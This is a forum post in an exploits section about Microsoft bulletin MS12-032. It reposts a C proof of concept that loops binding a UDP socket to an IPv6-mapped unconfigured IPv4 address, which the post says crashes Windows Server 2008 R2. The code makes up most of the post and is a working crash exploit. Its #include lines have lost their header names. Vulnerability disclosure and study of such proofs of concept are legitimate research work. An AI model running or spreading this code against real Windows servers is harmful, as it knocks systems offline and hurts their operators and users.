Jump to content
Nytro

MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege

Microsoft update release Microsoft Security Bulletin MS12-032 - Important : Vulnerability in TCP/IP Could Allow Elevation of Privilege (2688338)

Possible MS12-032 Proof of concept from StackOverflow thx to @avivra

We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines. 

// the program attempts to bind to IPV6-mapped IPV4 address
// in a tight loop. If the address is not configured on the machine
// running the program crashes Windows Server 2008 R2 (if program is 32-bit)

#include
#include
#include
#include

#define IPV6_V6ONLY 27

void MyWsaStartup()
{
WORD wVersionRequested;
WSADATA wsaData;
int err;

wVersionRequested = MAKEWORD(2, 2);

err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0) {
printf("WSAStartup failed with error: %d\n", err);
exit(-1);
}
}

void main()
{
MyWsaStartup();
bool bindSuccess = false;

while(!bindSuccess)
{
SOCKET sock = WSASocket(AF_INET6,
SOCK_DGRAM,
IPPROTO_UDP,
NULL,
0,
WSA_FLAG_OVERLAPPED);
if(sock == INVALID_SOCKET)
{
printf("WSASocket failed\n");
exit(-1);
}

DWORD val = 0;
if (setsockopt(sock,
IPPROTO_IPV6,
IPV6_V6ONLY,
(const char*)&val,
sizeof(val)) != 0)
{
printf("setsockopt failed\n");
closesocket(sock);
exit(-1);
}

sockaddr_in6 sockAddr;
memset(&sockAddr, 0, sizeof(sockAddr));
sockAddr.sin6_family = AF_INET6;
sockAddr.sin6_port = htons(5060);

// set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)
// that is [::FFFF:169.13.13.13]
sockAddr.sin6_addr.u.Byte[15] = 13;
sockAddr.sin6_addr.u.Byte[14] = 13;
sockAddr.sin6_addr.u.Byte[13] = 13;
sockAddr.sin6_addr.u.Byte[12] = 169;
sockAddr.sin6_addr.u.Byte[11] = 0xFF;
sockAddr.sin6_addr.u.Byte[10] = 0xFF;

int size = 28; // 28 is sizeof(sockaddr_in6)

int nRet = bind(sock, (sockaddr*)&sockAddr, size);
if(nRet == SOCKET_ERROR)
{
closesocket(sock);
Sleep(100);
}
else
{
bindSuccess = true;
printf("bind succeeded\n");
closesocket(sock);
}
}
}

by d3v1l at 22:37

Sursa: Security-Shell: MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...